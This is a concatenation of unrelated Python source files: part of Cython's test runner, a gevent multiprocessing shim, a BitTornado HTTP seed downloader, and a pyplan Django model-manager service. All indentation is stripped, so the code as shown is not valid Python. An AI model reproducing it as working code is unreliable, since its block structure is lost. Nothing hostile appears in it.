from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
gmultiprocessing.py
|
# -*- coding: utf-8 -*-
"""
Add compatibility for gevent and multiprocessing.
Source based on project GIPC 0.6.0
https://bitbucket.org/jgehrcke/gipc/
"""
import os, sys, signal, multiprocessing, multiprocessing.process, multiprocessing.reduction
gevent=None
geventEvent=None
def _tryGevent():
global gevent, geventEvent
if gevent and geventEvent: return False
try:
import gevent
from gevent import event as geventEvent
return True
except ImportError:
raise ValueError('gevent not found')
def Process(target, args=(), kwargs={}, name=None): # daemon=None
# check if gevent availible
try: _tryGevent()
except ValueError:
print 'Gevent not founded, switching to native'
return multiprocessing.Process(target=target, args=args, kwargs=kwargs, name=name)
if int(gevent.__version__[0])<1:
raise NotImplementedError('Gmultiprocessing supports only gevent>=1.0, your version %s'%gevent.__version__)
if not isinstance(args, tuple):
raise TypeError('<args> must be a tuple')
if not isinstance(kwargs, dict):
raise TypeError('<kwargs> must be a dict')
p = _GProcess(
target=_child,
name=name,
kwargs={"target": target, "args": args, "kwargs": kwargs}
)
# if daemon is not None: p.daemon = daemon
return p
def _child(target, args, kwargs):
"""Wrapper function that runs in child process. Resets gevent/libev state
and executes user-given function.
"""
_tryGevent()
_reset_signal_handlers()
gevent.reinit()
hub = gevent.get_hub()
del hub.threadpool
hub._threadpool = None
hub.destroy(destroy_loop=True)
h = gevent.get_hub(default=True)
assert h.loop.default, 'Could not create libev default event loop.'
target(*args, **kwargs)
class _GProcess(multiprocessing.Process):
"""
Compatible with the ``multiprocessing.Process`` API.
"""
try:
from multiprocessing.forking import Popen as mp_Popen
except ImportError:
# multiprocessing's internal structure has changed from 3.3 to 3.4.
from multiprocessing.popen_fork import Popen as mp_Popen
# Monkey-patch and forget about the name.
mp_Popen.poll = lambda *a, **b: None
del mp_Popen
def start(self):
_tryGevent()
# Start grabbing SIGCHLD within libev event loop.
gevent.get_hub().loop.install_sigchld()
# Run new process (based on `fork()` on POSIX-compliant systems).
super(_GProcess, self).start()
# The occurrence of SIGCHLD is recorded asynchronously in libev.
# This guarantees proper behavior even if the child watcher is
# started after the child exits. Start child watcher now.
self._sigchld_watcher = gevent.get_hub().loop.child(self.pid)
self._returnevent = gevent.event.Event()
self._sigchld_watcher.start(self._on_sigchld, self._sigchld_watcher)
def _on_sigchld(self, watcher):
"""Callback of libev child watcher. Called when libev event loop
catches corresponding SIGCHLD signal.
"""
watcher.stop()
# Status evaluation copied from `multiprocessing.forking` in Py2.7.
if os.WIFSIGNALED(watcher.rstatus):
self._popen.returncode = -os.WTERMSIG(watcher.rstatus)
else:
assert os.WIFEXITED(watcher.rstatus)
self._popen.returncode = os.WEXITSTATUS(watcher.rstatus)
self._returnevent.set()
def is_alive(self):
assert self._popen is not None, "Process not yet started."
if self._popen.returncode is None:
return True
return False
@property
def exitcode(self):
if self._popen is None:
return None
return self._popen.returncode
def __repr__(self):
exitcodedict = multiprocessing.process._exitcode_to_name
status = 'started'
if self._parent_pid != os.getpid(): status = 'unknown'
elif self.exitcode is not None: status = self.exitcode
if status == 0: status = 'stopped'
elif isinstance(status, int):
status = 'stopped[%s]' % exitcodedict.get(status, status)
return '<%s(%s, %s%s)>' % (type(self).__name__, self._name, status, self.daemon and ' daemon' or '')
def join(self, timeout=None):
"""
Wait cooperatively until child process terminates or timeout occurs.
:arg timeout: ``None`` (default) or a a time in seconds. The method
simply returns upon timeout expiration. The state of the process
has to be identified via ``is_alive()``.
"""
assert self._parent_pid == os.getpid(), "I'm not parent of this child."
assert self._popen is not None, 'Can only join a started process.'
# Resemble multiprocessing's join() method while replacing
# `self._popen.wait(timeout)` with
# `self._returnevent.wait(timeout)`
self._returnevent.wait(timeout)
if self._popen.returncode is not None:
if hasattr(multiprocessing.process, '_children'): # This is for Python 3.4.
kids = multiprocessing.process._children
else: # For Python 2.6, 2.7, 3.3.
kids = multiprocessing.process._current_process._children
kids.discard(self)
# Inspect signal module for signals whose action is to be restored to the default action right after fork.
_signals_to_reset = [getattr(signal, s) for s in
set([s for s in dir(signal) if s.startswith("SIG")]) -
# Exclude constants that are not signals such as SIG_DFL and SIG_BLOCK.
set([s for s in dir(signal) if s.startswith("SIG_")]) -
# Leave handlers for SIG(STOP/KILL/PIPE) untouched.
set(['SIGSTOP', 'SIGKILL', 'SIGPIPE'])]
def _reset_signal_handlers():
for s in _signals_to_reset:
if s < signal.NSIG:
signal.signal(s, signal.SIG_DFL)
PY3 = sys.version_info[0] == 3
if PY3:
def _reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def __exec(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
__exec("""def _reraise(tp, value, tb=None): raise tp, value, tb""")
|
HTTPDownloader.py
|
# Written by John Hoffman
# see LICENSE.txt for license information
from horde.BitTornado.CurrentRateMeasure import Measure
from random import randint
from urlparse import urlparse
from httplib import HTTPConnection
from urllib import quote
from threading import Thread
from horde.BitTornado.__init__ import product_name,version_short
try:
True
except:
True = 1
False = 0
EXPIRE_TIME = 60 * 60
VERSION = product_name+'/'+version_short
class haveComplete:
def complete(self):
return True
def __getitem__(self, x):
return True
haveall = haveComplete()
class SingleDownload:
def __init__(self, downloader, url):
self.downloader = downloader
self.baseurl = url
try:
(scheme, self.netloc, path, pars, query, fragment) = urlparse(url)
except:
self.downloader.errorfunc('cannot parse http seed address: '+url)
return
if scheme != 'http':
self.downloader.errorfunc('http seed url not http: '+url)
return
try:
self.connection = HTTPConnection(self.netloc)
except:
self.downloader.errorfunc('cannot connect to http seed: '+url)
return
self.seedurl = path
if pars:
self.seedurl += ';'+pars
self.seedurl += '?'
if query:
self.seedurl += query+'&'
self.seedurl += 'info_hash='+quote(self.downloader.infohash)
self.measure = Measure(downloader.max_rate_period)
self.index = None
self.url = ''
self.requests = []
self.request_size = 0
self.endflag = False
self.error = None
self.retry_period = 30
self._retry_period = None
self.errorcount = 0
self.goodseed = False
self.active = False
self.cancelled = False
self.resched(randint(2,10))
def resched(self, len = None):
if len is None:
len = self.retry_period
if self.errorcount > 3:
len = len * (self.errorcount - 2)
self.downloader.rawserver.add_task(self.download, len)
def _want(self, index):
if self.endflag:
return self.downloader.storage.do_I_have_requests(index)
else:
return self.downloader.storage.is_unstarted(index)
def download(self):
self.cancelled = False
if self.downloader.picker.am_I_complete():
self.downloader.downloads.remove(self)
return
self.index = self.downloader.picker.next(haveall, self._want)
if ( self.index is None and not self.endflag
and not self.downloader.peerdownloader.has_downloaders() ):
self.endflag = True
self.index = self.downloader.picker.next(haveall, self._want)
if self.index is None:
self.endflag = True
self.resched()
else:
self.url = ( self.seedurl+'&piece='+str(self.index) )
self._get_requests()
if self.request_size < self.downloader.storage._piecelen(self.index):
self.url += '&ranges='+self._request_ranges()
rq = Thread(target = self._request)
rq.setDaemon(False)
rq.start()
self.active = True
def _request(self):
import encodings.ascii
import encodings.punycode
import encodings.idna
self.error = None
self.received_data = None
try:
self.connection.request('GET',self.url, None,
{'User-Agent': VERSION})
r = self.connection.getresponse()
self.connection_status = r.status
self.received_data = r.read()
except Exception, e:
self.error = 'error accessing http seed: '+str(e)
try:
self.connection.close()
except:
pass
try:
self.connection = HTTPConnection(self.netloc)
except:
self.connection = None # will cause an exception and retry next cycle
self.downloader.rawserver.add_task(self.request_finished)
def request_finished(self):
self.active = False
if self.error is not None:
if self.goodseed:
self.downloader.errorfunc(self.error)
self.errorcount += 1
if self.received_data:
self.errorcount = 0
if not self._got_data():
self.received_data = None
if not self.received_data:
self._release_requests()
self.downloader.peerdownloader.piece_flunked(self.index)
if self._retry_period:
self.resched(self._retry_period)
self._retry_period = None
return
self.resched()
def _got_data(self):
if self.connection_status == 503: # seed is busy
try:
self.retry_period = max(int(self.received_data),5)
except:
pass
return False
if self.connection_status != 200:
self.errorcount += 1
return False
self._retry_period = 1
if len(self.received_data) != self.request_size:
if self.goodseed:
self.downloader.errorfunc('corrupt data from http seed - redownloading')
return False
self.measure.update_rate(len(self.received_data))
self.downloader.measurefunc(len(self.received_data))
if self.cancelled:
return False
if not self._fulfill_requests():
return False
if not self.goodseed:
self.goodseed = True
self.downloader.seedsfound += 1
if self.downloader.storage.do_I_have(self.index):
self.downloader.picker.complete(self.index)
self.downloader.peerdownloader.check_complete(self.index)
self.downloader.gotpiecefunc(self.index)
return True
def _get_requests(self):
self.requests = []
self.request_size = 0L
while self.downloader.storage.do_I_have_requests(self.index):
r = self.downloader.storage.new_request(self.index)
self.requests.append(r)
self.request_size += r[1]
self.requests.sort()
def _fulfill_requests(self):
start = 0L
success = True
while self.requests:
begin, length = self.requests.pop(0)
if not self.downloader.storage.piece_came_in(self.index, begin,
self.received_data[start:start+length]):
success = False
break
start += length
return success
def _release_requests(self):
for begin, length in self.requests:
self.downloader.storage.request_lost(self.index, begin, length)
self.requests = []
def _request_ranges(self):
s = ''
begin, length = self.requests[0]
for begin1, length1 in self.requests[1:]:
if begin + length == begin1:
length += length1
continue
else:
if s:
s += ','
s += str(begin)+'-'+str(begin+length-1)
begin, length = begin1, length1
if s:
s += ','
s += str(begin)+'-'+str(begin+length-1)
return s
class HTTPDownloader:
def __init__(self, storage, picker, rawserver,
finflag, errorfunc, peerdownloader,
max_rate_period, infohash, measurefunc, gotpiecefunc):
self.storage = storage
self.picker = picker
self.rawserver = rawserver
self.finflag = finflag
self.errorfunc = errorfunc
self.peerdownloader = peerdownloader
self.infohash = infohash
self.max_rate_period = max_rate_period
self.gotpiecefunc = gotpiecefunc
self.measurefunc = measurefunc
self.downloads = []
self.seedsfound = 0
def make_download(self, url):
self.downloads.append(SingleDownload(self, url))
return self.downloads[-1]
def get_downloads(self):
if self.finflag.isSet():
return []
return self.downloads
def cancel_piece_download(self, pieces):
for d in self.downloads:
if d.active and d.index in pieces:
d.cancelled = True
|
service.py
|
import base64
import datetime
import os
import random
import re
import sys
import tempfile
import threading
import unicodedata
import zipfile
from itertools import chain
from numbers import Number
from os.path import join
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from rest_framework import exceptions
from pyplan.pyplan.common.baseService import BaseService
from pyplan.pyplan.common.calcEngine import CalcEngine
from pyplan.pyplan.common.utils import _uploadFile
from pyplan.pyplan.department.models import Department
from pyplan.pyplan.filemanager.classes.fileEntry import FileEntry, eFileTypes
from pyplan.pyplan.filemanager.classes.fileEntryData import (FileEntryData,
eSpecialFileType,
eSpecialFolder)
from pyplan.pyplan.modelmanager.classes.eImportType import eImportType
from pyplan.pyplan.modelmanager.classes.modelInfo import ModelInfo
from pyplan.pyplan.modelmanager.classes.modelPreference import ModelPreference
from pyplan.pyplan.security.functions import _getAllSessions
from pyplan.pyplan.ws import sysMsg, ws_settings
class ModelManagerService(BaseService):
# model related methods
def openModel(self, file, forceSingleInstance=False):
"""Open model"""
res = None
found = False
if not forceSingleInstance:
my_sessions = _getAllSessions(self, onlyMySessions=True)
for item_session in my_sessions:
if item_session.currentModelFile == file:
found = True
res = ModelInfo()
res.name = item_session.currentModelName
res.uri = item_session.currentModelFile
res.modelId = item_session.currentModel
res.new_session_key = item_session.session_key
break
if not found:
current_session = self.getSession()
calcEngine = CalcEngine.tryLoadFromAppPool(current_session, file)
res = current_session.modelInfo
res.name = calcEngine.getModelName()
res.uri = file
# TODO: ver cuando tengamos licenciamiento
res.daysToExpire = 365
_modelPreferences = calcEngine.getModelPreferences()
res.modelId = _modelPreferences["identifier"] if "identifier" in _modelPreferences else ""
res.onOpenModel = _modelPreferences["onOpenModel"] if "onOpenModel" in _modelPreferences else ""
res.onOpenDashId = _modelPreferences["onOpenDashId"] if "onOpenDashId" in _modelPreferences else ""
if not calcEngine.from_app_pool:
res.engineUID = calcEngine.getEngineUID()
res.engineURI = calcEngine.getEngineURI()
res.engineParams = calcEngine.getEngineParams()
self.saveSession()
calcEngine = None
if not res is None:
is_public = False
can_edit = False
if "/public/" in file.lower():
is_public = True
if self.current_user.has_perm("pyplan.change_model") \
and not is_public or self.current_user.has_perm("pyplan.change_public_model") \
and is_public:
can_edit = True
res.canEdit = can_edit
res.readonly = not can_edit
# check for other session for mark as readonly
try:
for db_session in self.session_store.get_model_class().objects.all():
_decoded = db_session.get_decoded()
if "data" in _decoded and "modelInfo" in _decoded["data"] \
and _decoded["data"]["modelInfo"]["uri"] == file \
and int(_decoded["data"]["userCompanyId"]) != self.getSession().userCompanyId \
and not _decoded["data"]["modelInfo"]["readonly"]:
res.readonly = True
res.readOnlyReason = f"The model is being used by '{_decoded['data']['userFullName']}'. The model will be opened in read-only mode."
break
except Exception as ex:
print(
f"Error checking other session for mark as readonly: {str(ex)}")
self.saveSession()
return res
def getModelInfo(self):
"""Navigate Diagram"""
session = self.client_session
if not session is None:
modelInfo = session.modelInfo
storage = FileSystemStorage()
file_path = join(settings.MEDIA_ROOT, "models", modelInfo.uri)
file_size = storage.size(file_path)
if file_size > 1e+6:
file_size = f"{round(file_size / 1024 / 1024, 2)} MB"
else:
if file_size > 1e+3:
file_size = f"{round(file_size / 1024, 2)} kB"
else:
file_size = f"{file_size} B"
created_time = storage.get_created_time(file_path)
modified_time = storage.get_modified_time(file_path)
modelInfo.uri
res = [
{"Key": "modelinfo_model_id", "Value": modelInfo.modelId},
{"Key": "modelinfo_model_name", "Value": modelInfo.name},
{"Key": "modelinfo_model_file", "Value": modelInfo.uri},
{"Key": "modelinfo_file_size", "Value": file_size},
{"Key": "modelinfo_created_date",
"Value": f"{created_time.strftime('%Y-%m-%d %H:%M')} hs."},
{"Key": "modelinfo_updated_date",
"Value": f"{modified_time.strftime('%Y-%m-%d %H:%M')} hs."},
]
return res
else:
raise exceptions.NotAcceptable("Can't find session")
def saveModel(self):
"""Saves Model"""
calcEngine = CalcEngine.factory(self.client_session)
file_path = join(settings.MEDIA_ROOT, "models",
self.client_session.modelInfo.uri)
return calcEngine.saveModel(file_path)
def saveModelAs(self, modelName):
"""Saves Model With New Name"""
if self.checkModelOpen():
currentPath = self.client_session.modelInfo.uri
folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]
file_path = join(folderPath, f'{modelName}.ppl')
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
if not storage.exists(file_path):
calcEngine = CalcEngine.factory(self.client_session)
try:
fullPath = join(storage.base_location, file_path)
newModel = calcEngine.saveModel(fullPath)
current_session = self.getSession()
res = current_session.modelInfo
res.uri = file_path
self.saveSession()
calcEngine = None
return res
except Exception as ex:
raise exceptions.ErrorDetail(
f'Error when saving the model: {str(ex)}')
raise exceptions.NotAcceptable(
"The file name you provide already exists")
raise exceptions.NotAcceptable("There's no currentModel")
def navigateDiagram(self, module_id, include_arrows):
"""Navigate Diagram"""
calcEngine = CalcEngine.factory(self.client_session)
res = None
if module_id:
res = calcEngine.getDiagram(module_id)
else:
res = calcEngine.getDiagram()
return res
def getArrows(self, module_id):
"""Get Diagram Arrows"""
calcEngine = CalcEngine.factory(self.client_session)
if not module_id:
current_session = self.getSession()
module_id = current_session.modelInfo.modelId
return {
"arrows": calcEngine.getArrows(module_id),
"module_id": module_id
}
def getToolbars(self):
"""Get Toolbars"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.getToolbars(join(settings.MEDIA_ROOT, 'models', self.client_session.companyName))
def createNewModel(self, modelName):
"""Creates a new model """
try:
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
folderSufix = 1
new_model_name = modelName
while storage.exists(join(storage.base_location, new_model_name)):
folderSufix += 1
new_model_name = f'{modelName}_{folderSufix}'
folder_path = join(storage.base_location, new_model_name)
model_file = join(folder_path, f'{new_model_name}.ppl')
if not storage.exists(folder_path):
os.mkdir(folder_path)
calcEngine = CalcEngine.factory(self.client_session)
if calcEngine.createNewModel(model_file, new_model_name):
self.closeModel()
return self.openModel(join(storage.base_location, new_model_name, f'{new_model_name}.ppl'))
except Exception as ex:
raise ex
def getModelPreferences(self):
"""Get Model Preferences"""
calcEngine = CalcEngine.factory(self.client_session)
engineResponse = calcEngine.getModelPreferences()
# fill default preferences
engineResponse["modelId"] = engineResponse["identifier"]
if not "changeIdentifier" in engineResponse:
engineResponse["changeIdentifier"] = "1"
return engineResponse
def changeToOtherModelSession(self, new_session_key):
"""Change to other model of the current user session
"""
if self.existSession(new_session_key):
new_session = self.getSessionByKey(new_session_key)
if self.getSession().userCompanyId == new_session.userCompanyId:
uri = new_session.modelInfo.uri
return self.openModel(uri)
else:
raise exceptions.PermissionDenied()
else:
raise exceptions.PermissionDenied()
def setModelPreferences(self, modelPreferences):
"""Set model preferences"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.setModelProperties(modelPreferences)
if result.text == 'ok':
model_pref = ModelPreference(**modelPreferences)
if model_pref.identifier or model_pref.title:
self.client_session.modelInfo.modelId = model_pref.identifier
self.client_session.modelInfo.name = model_pref.title
self.saveSession()
return self.client_session
return False
def closeModel(self):
"""Close current model"""
if self.checkModelOpen():
calcEngine = CalcEngine.factory(self.client_session)
if calcEngine.closeModel():
current_session = self.getSession()
current_session.modelInfo = ModelInfo()
self.saveSession()
else:
return False
return True
# node related methods
def getNodeProperties(self, node_id, properties):
"""Get Node Properties"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeProperties(node_id, properties)
return result
def setNodeProperties(self, node_id, properties):
"""Set Node Properties"""
# map same properties
if node_id and len(properties) > 0:
for prop in properties:
if prop["name"] and prop["name"].lower() == "picture":
if not prop["value"]:
prop["value"] = None
else:
file_extension = prop["value"].rsplit(".").pop()
file_path = join(settings.MEDIA_ROOT, 'tmp', prop['value'])
with open(file_path, "rb") as image_file:
prop["value"] = f'data:image/{file_extension};base64,{str(base64.b64encode(image_file.read()), "utf-8")}'
try:
os.remove(file_path)
except Exception as ex:
raise exceptions.NotAcceptable(
f'There was an error deleting the tempfile:{str(ex)}')
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.setNodeProperties(node_id, properties)
return result
def getNodeInputs(self, node_id):
"""Get Node Inputs"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeInputs(node_id)
return result
def getNodeOutputs(self, node_id):
"""Get Node Outputs"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeOutputs(node_id)
return result
def searchNodes(self, text, module_id, node_class, extra_classes, fill_detail):
"""Search Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.searchNodes(
text, module_id, node_class, extra_classes, fill_detail)
return result
def searchForAutocomplete(self, text):
"""Search for autocomplete definition"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.searchNodes(text, None, None, [], True)
return result
def previewNode(self, node, debugMode=""):
"""Evaluate and return node result preview"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.previewNode(node, debugMode)
def evaluate(self, definition):
"""Evaluate definition and return result"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.evaluate(definition)
def callFunction(self, nodeId, params):
"""Call node function"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.callFunction(nodeId, params)
def setNodesSize(self, values):
"""Set nodes size"""
calcEngine = CalcEngine.factory(self.client_session)
try:
for value in values:
# ToDo: return an array of engine responses
calcEngine.setNodeProperties(value["id"], [
{"name": "x", "value": value["x"]},
{"name": "y", "value": value["y"]},
{"name": "w", "value": value["w"]},
{"name": "h", "value": value["h"]},
])
return True
except Exception as ex:
raise ex
def setNodesPosition(self, values):
"""Set nodes position"""
calcEngine = CalcEngine.factory(self.client_session)
try:
for value in values:
# ToDo: return an array of engine responses
calcEngine.setNodeProperties(value["id"], [
{"name": "x", "value": value["x"]},
{"name": "y", "value": value["y"]},
{"name": "w", "value": value["w"]},
{"name": "h", "value": value["h"]},
])
return True
except Exception as ex:
raise ex
def getNodeProfile(self, node_id):
"""Get Node Profile"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.profileNode(node_id)
def createNode(self, node):
"""create Node"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createNode(node)
def deleteNodes(self, node_ids):
"""delete Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.deleteNodes(node_ids)
def createAlias(self, node_ids):
"""create Alias"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createAlias(node_ids)
def createInputNode(self, node_ids):
"""create Input Node"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createInputNode(node_ids)
def copyNodes(self, nodes):
"""copy Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.copyNodes(nodes)
def copyAsValues(self, params):
"""copy Nodes as values"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.copyAsValues(params)
def moveNodes(self, nodes):
"""move Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.moveNodes(nodes)
def stop(self):
"""Try to stop current process"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.stop()
def setNodeZ(self, nodes):
"""Sets the Z position of a node"""
newZ = 1
